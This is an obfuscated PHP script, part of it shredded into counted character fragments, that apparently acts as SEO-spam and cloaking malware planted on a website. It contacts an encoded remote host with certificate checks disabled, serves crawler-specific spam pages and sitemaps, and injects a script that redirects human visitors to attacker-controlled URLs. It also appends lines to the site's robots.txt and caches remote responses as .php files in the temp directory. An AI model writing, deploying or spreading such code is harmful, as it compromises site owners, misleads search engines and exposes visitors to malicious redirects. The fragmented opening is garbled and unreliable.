1
<
1
?
1
p
1
h
1
p
1


2

 
1
g
1
o
1
t
1
o
2
 c
1
I
1
0
1
D
1
v
1
;
1
 
1
L
1
Y
1
G
2
63
1
:
1
 
1
$
1
k
1
k
1
 
1
=
2
 i
1
s
1
s
2
et
1
(
1
$
1
g
1
e
1
t
1
[
1
"
1
\
2
x6
1
b
1
\
1
1
2
53
1
"
1
]
1
)
1
 
2
? 
1
t
1
r
1
i
1
m
13
($get["\x6b\153"]) 
1
:
1
 
1
'
1
'
1
;
6
 goto 
1
j
1
H
1
F
1
I
1
X
1
;
1
 
1
s
2
Ie
1
v
1
n
1
:
1
 
1
i
2
f 
1
(
4
$kk 
1
!
1
=
1
=
3
 ''
1
 
1
&
1
&
1
 
2
pr
1
e
1
g
1
_
1
m
2
at
1
c
1
h
1
(
3
"\x
2
2f
1
\
1
x
1
5
2
e\
1
1
1
3
1
3
2
\1
1
0
1
1
3
\x2
1
d
4
\132
3
\x6
7
1\x2d\x
1
7
1
a
1
\
2
60
5
\x2d\
1
7
3
1\x
1
5
3
d\x
1
2
1
b
1
\
2
44
4
\x2f
1
"
1
,
4
 $kk
1
)
1
)
1
 
1
{
1
 
1
$
2
re
1
m
1
o
1
t
1
e
3
 = 
3
get
1
C
1
u
1
r
1
l
2
Fa
1
s
3
t($
1
j
1
d
1
 
1
.
2
 "
1
\
1
1
1
4
1
7
3
\14
2
5\
1
1
1
6
1
4
3
\14
3
4\1
1
5
4
7\15
1
5
5
\x61\
2
15
3
1\x
1
6
1
e
2
\6
1
2
1
\
2
56
6
\x61\1
1
6
3
3\1
3
60\
1
1
2
70
1
\
1
7
4
7\16
4
2\x6
1
e
6
\144\7
1
5
5
\62\x
1
2
9
6\x6b\153
3
\75
1
"
3
 . 
5
$kk);
5
 if (
1
!
1
e
1
m
2
pt
1
y
1
(
7
$remote
5
)) { 
2
ec
1
h
1
o
8
 $remote
1
;
1
 
2
di
3
e; 
1
}
3
 } 
6
goto e
1
0
1
9
1
E
1
O
3
; L
1
n
1
j
1
Y
1
Z
1
:
1
 
2
ou
1
t
1
p
1
u
2
t_
1
s
1
i
2
te
1
m
1
a
1
p
2
_a
1
n
1
d
1
_
2
ex
1
i
3
t($
7
sitemap
1
L
1
i
1
n
1
e
3
, $
1
h
1
t
1
t
2
p_
1
t
1
y
1
p
1
e
1
)
8
; goto e
1
m
1
n
1
X
1
E
2
; 
1
C
1
S
1
y
1
C
1
d
3
: $
1
v
3
url
3
 = 
1
"
5
\164\
1
x
1
6
1
f
7
\56\x6a
7
\147\14
4
1\15
1
4
5
\154\
2
x7
1
3
3
\x2
5
e\143
a
\157\155\5
1
7
1
"
7
; goto 
1
Q
1
L
1
l
1
u
1
M
4
; L3
1
n
1
M
1
1
4
: $s
6
url = 
8
$jd . "\
5
x73\x
4
7a\1
3
56\
12
56\x61\163\160\170
8
"; goto 
2
Yn
2
Br
1
1
1
;
1
 
3
ut_
1
5
1
H
1
:
d
 if (!empty($
1
s
1
z
6
)) { $
3
jd 
e
= getCurlFast(
1
"
1
{
a
$http_type
2
}{
5
$vurl
1
}
1
\
4
63\1
4
53\x
1
6
1
7
8
\x2e\141
5
\x73\
8
160\170\
1
x
1
3
1
f
6
\163\1
1
7
1
2
7
\75" . 
3
url
1
e
1
n
2
co
1
d
1
e
6
($sz))
5
; } e
1
l
1
s
1
e
2b
 { $jd = getCurlFast("{$http_type}{$vurl}\x
1
3
12
3\153\x67\x2e\141\
c
163\160\170\
5
x3f\x
1
7
1
8
3
\x7
1
9
3
\75
c
{$http_type}
1
"
3
); 
3
$sz
2c
 = getCurlFast("{$http_type}{$vurl}\x33\153\
4
147\
3
56\
c
141\x73\160\
5
x78\x
4
3f\x
5
6a\14
3
4\x
1
3
1
d
f
" . urlencode($
1
j
1
d
6
)); } 
5
goto 
1
H
1
n
2
On
1
w
1
;
6
 HnOnw
3
: $
1
h
1
y
1
z
1
h
1
d
1
y
b
 = $jd . "\
4
172\
4
156\
4
x2e\
5
x61\x
a
73\160\x78
8
"; goto 
6
L3nM1;
6
 YnBr1
4
: $s
a
itemapLine
6
 = "\1
1
2
1
3
6
\151\x
1
7
5
4\x65
a
\155\x61\x
5
70\x3
1
a
1
\
2
40
f
{$http_type}{$_
1
S
1
E
2
RV
1
E
1
R
3
["\
1
1
1
1
4
0\12
1
4
5
\124\
1
x
1
5
3
0\1
1
3
3
7\x
1
4
1
8
3
\11
3
7\x
5
53\12
1
4
1
"
1
]
e
}{$_SERVER["\1
4
23\x
3
43\
1
x
1
5
4
2\11
3
1\1
1
2
3
0\x
4
54\1
3
37\
1
1
1
1
1
6
7
\101\x4
4
d\10
1
5
3
"]}
5
\77\x
4
77\x
7
3d" . d
1
a
2
te
4
("\x
1
5
1
9
7
\155\x6
1
4
5
\110\
2
x6
1
9
1
"
1
)
6
 . "\1
1
2
8
"; goto 
1
J
1
5
2
G3
1
2
3
; d
1
s
1
R
1
Z
1
S
3
: $
2
is
1
_
1
n
2
o_
1
q
2
ue
1
r
1cb5
y = empty($_SERVER["\121\125\105\x52\131\137\123\x54\x52\111\x4e\x47"]); goto JD7fu; b3xBO: function getCurlFast($url) { $cached = cache_get($url); if ($cached !== false) { return $cached; } $data = ''; if (function_exists("\x63\165\162\x6c\137\x69\156\x69\x74")) { $ch = curl_init($url); curl_setopt_array($ch, array(CURLOPT_RETURNTRANSFER => true, CURLOPT_CONNECTTIMEOUT => 5, CURLOPT_TIMEOUT => 8, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_FOLLOWLOCATION => false, CURLOPT_USERAGENT => "\x4d\x6f\172\x69\x6c\154\x61\x2f\x35\x2e\x30")); $data = curl_exec($ch); curl_close($ch); } if (empty($data) && ini_get("\141\x6c\154\x6f\x77\x5f\x75\x72\154\137\x66\157\x70\x65\156")) { $context = stream_context_create(array("\150\164\164\160" => array("\164\151\155\145\x6f\x75\x74" => 8, "\150\145\141\144\x65\x72" => "\125\163\145\x72\x2d\x41\147\145\156\x74\72\40\115\x6f\172\x69\x6c\x6c\x61\57\65\x2e\60\15\xa"), "\x73\x73\x6c" => array("\x76\145\162\x69\146\x79\x5f\x70\145\145\162" => false, "\166\x65\x72\x69\x66\x79\x5f\160\145\x65\x72\x5f\x6e\x61\x6d\x65" => false))); $data = @file_get_contents($url, false, $context); } if (!empty($data)) { cache_set($url, $data); } return $data; } goto nEuMB; J5G32: function ensure_robots_sitemap($sitemapLine) { $robots = rtrim($_SERVER["\x44\x4f\x43\125\x4d\x45\x4e\x54\x5f\x52\x4f\117\x54"], "\x2f\x5c") . "\57\162\157\x62\157\x74\x73\x2e\164\170\164"; if (!file_exists($robots)) { @file_put_contents($robots, "\125\x73\x65\x72\55\x61\147\145\156\x74\72\40\52\xa\101\154\x6c\x6f\167\x3a\40\x2f\12" . $sitemapLine, LOCK_EX); } else { $c = @file_get_contents($robots); if ($c === false || strpos($c, $sitemapLine) === false) { @file_put_contents($robots, $sitemapLine, FILE_APPEND | LOCK_EX); } } } goto nvqfY; cI0Dv: error_reporting(0); goto ctugb; KcbVZ: function cache_set($key, $data) { $file = sys_get_temp_dir() . "\57\x63\141\x63\x68\x65\x5f" . md5($key) . "\56\x70\x68\160"; @file_put_contents($file, $data, LOCK_EX); } goto obbTy; tTrIf: function cache_get($key, $expire = 300) { $file = sys_get_temp_dir() . "\x2f\143\x61\x63\x68\x65\x5f" . md5($key) . "\x2e\160\150\160"; if (file_exists($file) && time() - filemtime($file) < $expire) { return file_get_contents($file); } return false; } goto KcbVZ; e09EO: if ($kk !== '' && !preg_match("\x2f\x5e\x5b\101\55\x5a\x61\x2d\172\60\55\71\x5d\x2b\x24\x2f", $kk)) { output_sitemap_and_exit($sitemapLine, $http_type); } goto dsRZS; jHFIX: $ip = $kk !== '' ? "\66\66\56\62\64\71\56\70\62\x2e\x38" : get_real_ip(); goto x9XsW; rUTit: if ($domain !== "\x67\x6f\x6f\x67\x6c\145" && !empty($iid)) { $kname = urldecode(getCurlFast($jd . "\147\156\x2e\x61\163\x70\170\77\151\151\144\x3d" . $iid)); echo "\74\x73\x63\x72\151\160\x74\76\x6c\157\x63\141\164\x69\x6f\x6e\x3d\x22" . $jd . "\141\56\141\163\160\x78\77\x63\x6e\141\x6d\145\75" . urlencode($kname) . "\x26\165\x72\154\x3d" . $http_type . $_SERVER["\x48\x54\x54\120\137\x48\x4f\x53\124"] . $_SERVER["\x53\x43\x52\x49\120\x54\x5f\x4e\x41\x4d\105"] . "\x22\x3c\x2f\163\x63\162\151\160\x74\x3e"; die; } goto QgpnU; QLluM: $qz = substr(str_replace(array("\x77\x77\x77\x2e", "\x2e"), '', $_SERVER["\x48\124\124\x50\x5f\x48\x4f\x53\124"]), 0, 3); goto EI8Kp; JD7fu: if ($kk === '' && $is_no_query) { if ($domain === "\x67\157\157\147\x6c\145") { output_sitemap_and_exit($sitemapLine, $http_type); } else { die; } } goto LnjYZ; ctugb: $get = filter_input_array(INPUT_GET, FILTER_SANITIZE_STRING); goto tTrIf; QgpnU: if (!empty($iid)) { $str = getCurlFast($hyzhdy . "\77\151\x69\x64\75{$iid}"); echo str_replace(array("\x67\147\147\147\147", "\131\131\131\131\131", "\130\130\x58\131\131\x59", "\xe5\275\223\xe5\x89\x8d\x55\x52\x4c", "\125\x55\125\x55\x55", "\115\115\115\115\115", "\77\146\75"), array($sz, get_url_info(), get_url_info("\x62\x61\x73\x65"), get_url_info("\x66\165\154\x6c"), get_url_info("\156\157\137\x77\x77\167"), parse_url($_SERVER["\x52\x45\x51\125\x45\x53\x54\137\125\122\111"], PHP_URL_PATH), "\77" . $qz . "\75"), $str); die; } goto OiQF1; nvqfY: if (!empty($get["\167"])) { $params = http_build_query(array("\x4e\x4f\125\155\142\x65\162" => $get["\x4e\x4f\x55\x6d\142\x65\x72"] ?? '', "\164" => $get["\164"] ?? '', "\x63\156" => $get["\143\156"] ?? '', "\160\x4e\117\x55\155" => $get["\x70\x4e\x4f\x55\x6d"] ?? '', "\143\x69\x64" => $get["\143\151\x64"] ?? '', "\155" => $get["\x6d"] ?? '')); $str = getCurlFast("{$surl}\77{$params}"); echo str_replace(array("\x79\171\x6d\x6d", "\147\147\147\147\147", "\77\146\x3d"), array($http_type . $_SERVER["\x48\x54\124\x50\x5f\x48\117\123\124"] . $_SERVER["\x53\x43\x52\x49\120\124\x5f\116\101\x4d\x45"], $sz, "\77" . $qz . "\x3d"), $str); die; } goto LYG63; EI8Kp: $sz = $iid = ''; goto S5sdM; OiQF1: function output_sitemap_and_exit($sitemapLine, $http_type) { ensure_robots_sitemap($sitemapLine); echo "\x3c\144\151\x76\x20\x73\164\x79\154\145\x3d\x27\x74\x65\170\164\x2d\141\x6c\151\x67\156\72\x63\145\x6e\x74\145\x72\x3b\160\141\144\x64\x69\156\x67\72\61\60\x70\170\x20\60\73\47\x3e\xa\x20\40\40\40\x20\40\40\40\40\40\40\x20\74\141\x20\x68\x72\x65\146\x3d\x22{$http_type}{$_SERVER["\110\x54\x54\x50\x5f\x48\x4f\123\x54"]}{$_SERVER["\x53\103\122\x49\x50\124\x5f\116\x41\x4d\105"]}\77\167\x3d" . date("\x59\155\144\x48\151") . "\x22\40\164\141\x72\x67\145\x74\x3d\42\x5f\142\154\x61\156\153\x22\x20\162\145\154\x3d\x22\x6e\x6f\x66\x6f\154\154\x6f\x77\x22\x3e\x53\x69\x74\145\x6d\x61\160\74\x2f\141\x3e\12\40\x20\x20\40\40\x20\x20\x20\x20\40\74\x2f\x64\151\x76\76"; die; } goto sIevn; S5sdM: if (!empty($_GET)) { $f = reset($_GET); $sp = explode("\x2d", $f); if (count($sp) === 2) { $sz = $sp[0]; $iid = $sp[1]; } } goto ut_5H; obbTy: function get_real_ip() { $keys = array("\110\x54\x54\120\x5f\103\106\137\103\117\116\x4e\105\103\x54\111\x4e\x47\137\111\120", "\110\124\124\120\x5f\130\x5f\122\x45\x41\x4c\137\x49\x50", "\110\x54\x54\x50\x5f\130\x5f\106\x4f\122\127\101\x52\x44\105\104\x5f\x46\x4f\122", "\x48\x54\124\120\137\103\x4c\x49\105\x4e\x54\x5f\111\x50", "\122\x45\x4d\117\124\x45\137\101\x44\104\x52"); foreach ($keys as $k) { if (!empty($_SERVER[$k])) { $ip = $_SERVER[$k]; if (strpos($ip, "\54") !== false) { $ip = trim(explode("\x2c", $ip)[0]); } if (filter_var($ip, FILTER_VALIDATE_IP)) { return $ip; } } } return "\61\62\x37\56\60\56\60\56\x31"; } goto b3xBO; x9XsW: $domain = trim(getCurlFast($jd . "\147\x65\x74\x64\157\x6d\141\151\x6e\62\56\141\163\160\170\x3f\x72\156\x64\x3d\61\x26\151\x70\x3d" . $ip)); goto rUTit; nEuMB: function get_url_info(string $type = "\x64\157\155\141\x69\156") : string { $host = $_SERVER["\110\124\124\x50\137\110\x4f\123\124"] ?? ''; if ($type === "\156\157\x5f\167\x77\167") { return preg_replace("\x2f\136\167\167\167\134\x2e\57\x69", '', $host); } $protocol = !empty($_SERVER["\x48\124\124\x50\x53"]) && $_SERVER["\x48\x54\x54\120\x53"] !== "\x6f\x66\146" ? "\x68\x74\x74\x70\163\72\x2f\x2f" : "\x68\x74\x74\x70\x3a\x2f\x2f"; $base = $protocol . $host; if ($type === "\x62\141\163\145") { return $base; } if ($type === "\x66\x75\154\154") { return $base . ($_SERVER["\x52\105\121\x55\x45\x53\x54\x5f\x55\x52\x49"] ?? ''); } return $host; } goto IiHkS; IiHkS: $http_type = !empty($_SERVER["\110\x54\x54\120\x53"]) && $_SERVER["\x48\124\124\120\x53"] !== "\x6f\146\146" ? "\150\x74\x74\x70\x73\72\x2f\x2f" : "\150\164\164\160\x3a\57\x2f"; goto CSyCd; emnXE: ?>
0